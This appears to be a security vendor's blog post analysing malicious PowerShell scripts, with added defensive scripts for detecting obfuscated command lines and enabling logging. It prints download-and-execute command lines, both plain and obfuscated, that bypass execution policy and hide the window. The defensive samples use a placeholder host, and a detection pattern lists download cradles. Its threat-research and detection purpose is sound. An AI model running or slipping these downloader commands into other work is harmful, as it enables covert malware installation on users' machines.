Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance. Symantec analyzed PowerShell malware samples to find out how much of a danger they posed.
Of all of the PowerShell scripts analyzed through the BlueCoat Malware Analysis sandbox, 95.4 percent were malicious. This shows that externally sourced PowerShell scripts are a major threat to enterprises.
PowerShell – a language for everyone
Microsoft PowerShell is a powerful scripting language and shell framework primarily used on Windows computers. It has been around for more than 10 years and will replace the default command prompt on Windows in the future. While many system administrators use PowerShell scripts for daily management tasks, we have seen attackers increasingly using the framework for their campaigns.
Many recent targeted attacks have used PowerShell scripts. For example, the Odinaff group used malicious PowerShell scripts when it attacked financial organizations worldwide. Common cybercriminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry.
PowerShell is installed by default on most Windows computers, and most organizations do not have extended logging enabled for the framework. These two factors make PowerShell a favored attack tool. Furthermore, scripts are easy to obfuscate and can execute payloads directly from memory, so an infection need not leave a malicious file on disk.
Malicious PowerShell occurrences
We have predominantly seen malicious PowerShell scripts used as downloaders (for example, launched from Office macros) and during the lateral movement phase, where a threat executes code on a remote computer to spread inside the network.
The most prevalent malware families that currently use PowerShell are:
- W97M.Downloader (9.4 percent of all analyzed samples)
- Trojan.Kotver (4.5 percent)
- JS.Downloader ( percent)
These three threats have been distributed in spam emails.
Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections.
Apart from downloading payloads, malicious PowerShell scripts have been used to perform various tasks such as uninstalling security products, detecting sandboxed environments, or sniffing the network for passwords.
Disguising malicious scripts
The flexibility of the PowerShell language allows scripts to be obfuscated in multiple ways, such as command shortcuts, escape characters, or encoding functions.
For example, the following is a simple script that downloads and executes a remote file:
cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://[REMOVED]','%userappdata%.exe');start-process %userappdata%.exe
We have seen attackers use basic obfuscation to transform the same command into the following:
cmd.exe /c ping Local^hos^T & poWerSheLL.exe -eXecutio^nPOlIcy ByPasS^ -n^op^rO^fi -w 1 (n^ew^-^OB^Ject^ ne^t.we^Bcl^i^ent^)^.^do^wnlo^adf^Ile(^'http://[REMOVED]','%USERAPPDATA%.eXe');^S^tart-^PR^O^ce^SS^ %USERAPPDATA%.eXe
However, of the 111 analyzed threat families that use PowerShell, only eight percent used any obfuscation, such as mixed-case letters. None of the analyzed threats randomized the order of the command-line arguments. The most commonly used PowerShell command-line argument was “NoProfile” (34 percent), followed by “WindowStyle” (24 percent) and “ExecutionPolicy” (23 percent).
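The obfuscation above relies on two things that are easy to undo: cmd.exe strips its ^ escape character before powershell.exe ever sees the arguments, and powershell.exe accepts any unambiguous, case-insensitive prefix of a parameter name (so -n^op^rO^fi is just -NoProfile). The following script is an added example, not code from the original article, that normalizes such a command line and reports the indicators discussed in the text (hidden window, bypassed execution policy, download cradle, mixed-case tokens). The sample command lines, the example.invalid URL and the function names are constructed for illustration.

```powershell
# Added example (not from the original article): normalize a cmd.exe-launched
# PowerShell command line and report the indicators discussed in the text.
# Sample command lines below are constructed; the URL host is a placeholder.

function Get-PrefixPattern {
    # Build a regex alternation that matches every prefix of a parameter name
    # of at least $MinLength characters, longest first. powershell.exe accepts
    # any unambiguous prefix, which is why '-noprofi' and '-w' work.
    param([string]$Name, [int]$MinLength)
    $alts = for ($len = $Name.Length; $len -ge $MinLength; $len--) { $Name.Substring(0, $len) }
    return '-(' + ($alts -join '|') + ')(?![a-z])'
}

# Canonical parameter names plus the documented aliases that are not plain
# prefixes (-ep, -e, -ec). -replace is case-insensitive by default.
$ParamRules = @(
    @{ Pattern = (Get-PrefixPattern 'ExecutionPolicy' 2); Canonical = '-ExecutionPolicy' }
    @{ Pattern = '-ep(?![a-z])';                          Canonical = '-ExecutionPolicy' }
    @{ Pattern = (Get-PrefixPattern 'EncodedCommand' 2);  Canonical = '-EncodedCommand' }
    @{ Pattern = '-e(?![a-z])';                           Canonical = '-EncodedCommand' }
    @{ Pattern = '-ec(?![a-z])';                          Canonical = '-EncodedCommand' }
    @{ Pattern = (Get-PrefixPattern 'NoProfile' 3);       Canonical = '-NoProfile' }
    @{ Pattern = (Get-PrefixPattern 'NonInteractive' 4);  Canonical = '-NonInteractive' }
    @{ Pattern = (Get-PrefixPattern 'WindowStyle' 1);     Canonical = '-WindowStyle' }
)

# Indicators from the article, checked against the normalized command line.
$IndicatorRules = @(
    @{ Name = 'Hidden window';          Pattern = '-WindowStyle\s+(hidden|1)(?![a-z0-9])' }
    @{ Name = 'ExecutionPolicy bypass'; Pattern = '-ExecutionPolicy\s+(bypass|unrestricted)' }
    @{ Name = 'NoProfile';              Pattern = '-NoProfile' }
    @{ Name = 'Encoded command';        Pattern = '-EncodedCommand' }
    @{ Name = 'Download cradle';        Pattern = 'downloadfile|downloadstring|invoke-webrequest|\biwr\b' }
    @{ Name = 'Payload execution';      Pattern = 'start-process|invoke-expression|\biex\b' }
)

function Test-PowerShellCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # cmd.exe removes '^' before the arguments reach powershell.exe, so
    # stripping it recovers what actually executes.
    $stripped = $CommandLine -replace '\^', ''

    $normalized = $stripped
    foreach ($rule in $ParamRules) {
        $normalized = $normalized -replace $rule.Pattern, $rule.Canonical
    }

    $indicators = foreach ($rule in $IndicatorRules) {
        if ($normalized -match $rule.Pattern) { $rule.Name }
    }

    # Mixed-case heuristic: two or more lower-to-upper transitions inside one
    # token ('poWerSheLL', 'ByPasS'); legitimate names such as -NoProfile have one.
    $mixedCase = @(($stripped -split '\s+') | Where-Object {
        [regex]::Matches($_, '[a-z][A-Z]').Count -ge 2
    })

    [pscustomobject]@{
        Normalized      = $normalized
        Indicators      = @($indicators) -join ', '
        CaretEscapes    = [regex]::Matches($CommandLine, '\^').Count
        MixedCaseTokens = $mixedCase.Count
        Obfuscated      = ($CommandLine.Contains('^') -or $mixedCase.Count -gt 0)
    }
}

# Constructed samples: the plain and obfuscated downloader shapes from the
# article (with a placeholder host) and a benign administrative command.
$samples = @(
    "cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://example.invalid/a','%userappdata%.exe');start-process %userappdata%.exe"
    "cmd.exe /c ping Local^hos^T & poWerSheLL.exe -eXecutio^nPOlIcy ByPasS^ -n^op^rO^fi -w 1 (n^ew^-^OB^Ject^ ne^t.we^Bcl^i^ent^)^.^do^wnlo^adf^Ile(^'http://example.invalid/a','%USERAPPDATA%.eXe');^S^tart-^PR^O^ce^SS^ %USERAPPDATA%.eXe"
    "powershell.exe -NoProfile -Command Get-Service"
)

$samples | ForEach-Object { Test-PowerShellCommandLine -CommandLine $_ } | Format-List
```

Both downloader samples normalize to the same -ExecutionPolicy / -NoProfile / -WindowStyle form and trip the same five indicators; only the second reports caret escapes and mixed-case tokens, which is the point: a detection written against the normalized form is not defeated by this class of obfuscation. The benign third sample reports only NoProfile, so NoProfile alone should not be treated as malicious; it is the combination with a hidden window, a bypassed policy and a download cradle that matters.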
Symantec expects more PowerShell threats to appear in the future. We strongly recommend that system administrators upgrade to the latest version of PowerShell and enable its extended logging and monitoring capabilities.
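As an added example that is not part of the original article, the following script turns on the extended logging recommended above by writing the same policy registry keys that Group Policy sets (script block logging, module logging and transcription, available from Windows PowerShell 5.0 onward), and then queries the resulting script block events for the downloader strings discussed earlier. It must be run from an elevated PowerShell; the transcript directory and the function names are assumptions, and the detection pattern is illustrative rather than exhaustive.

```powershell
# Added example (not from the original article): enable PowerShell script block
# logging, module logging and transcription through the policy registry keys,
# then pull script block events (ID 4104) that look like downloaders.
# Requires an elevated session and Windows PowerShell 5.0 or later.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed location

    # Script block logging records the de-obfuscated text of every script block
    # as it is compiled, including code run purely from memory.
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

    # Module logging records pipeline execution details (event ID 4103);
    # the '*' = '*' value under ModuleNames covers all modules.
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Value 1 -Type DWord
    Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -Type String

    # Transcription keeps a per-session text record of input and output.
    $tr = Join-Path $PolicyRoot 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name 'EnableTranscripting' -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name 'EnableInvocationHeader' -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name 'OutputDirectory' -Value $TranscriptDir -Type String
}

function Get-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 500)

    # Strings typical of the downloader and fileless behaviour described in the
    # article; an illustrative list, not a complete one.
    $pattern = 'downloadfile|downloadstring|net\.webclient|frombase64string|invoke-expression|\biex\b|start-process'

    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event is the ScriptBlockText field.
            $text = [string]$_.Properties[2].Value
            if ($text -match $pattern) {
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    Level       = $_.LevelDisplayName   # 'Warning' marks blocks PowerShell itself flags as suspicious
                    Snippet     = ($text.Substring(0, [Math]::Min(120, $text.Length)) -replace '\s+', ' ')
                }
            }
        }
}

Enable-PowerShellLogging
# The policy settings are picked up by newly started PowerShell sessions.
Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Script block logging is the setting that matters most against the obfuscation shown earlier: the 4104 event carries the script block as PowerShell compiles it, after the cmd.exe escapes and the abbreviated parameters are gone, so the logged text is what a detection rule should be written against. Forward the Microsoft-Windows-PowerShell/Operational log to a central collector, since an attacker with local administrator rights can clear it.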
Symantec and Norton customers are protected against PowerShell threats through our multilayered security approach:
- Antivirus and Intrusion Prevention System (IPS) detections are in place for each of the discussed threat families
- Behavior-based detection blocks suspicious processes using the SONAR series of detections
- Email-filtering services such as Symantec Email Security.cloud can block emails associated with these attacks before they can reach users
- Symantec Messaging Gateway’s Disarm technology can also protect computers from many email-borne attacks by removing the malicious content from the attached documents before they even reach the user
- BlueCoat Malware Analysis sandbox uses a dual-detection approach that combines virtualization and emulation to detect malicious behavior
- Symantec’s Advanced Threat Protection solution allows customers to uncover attacks that would otherwise evade detection
- Symantec’s Cyber Security Services can help organizations achieve a higher level of security with our leading cyber threat experts for global threat and adversary intelligence, advanced threat monitoring, cyber readiness, and incident response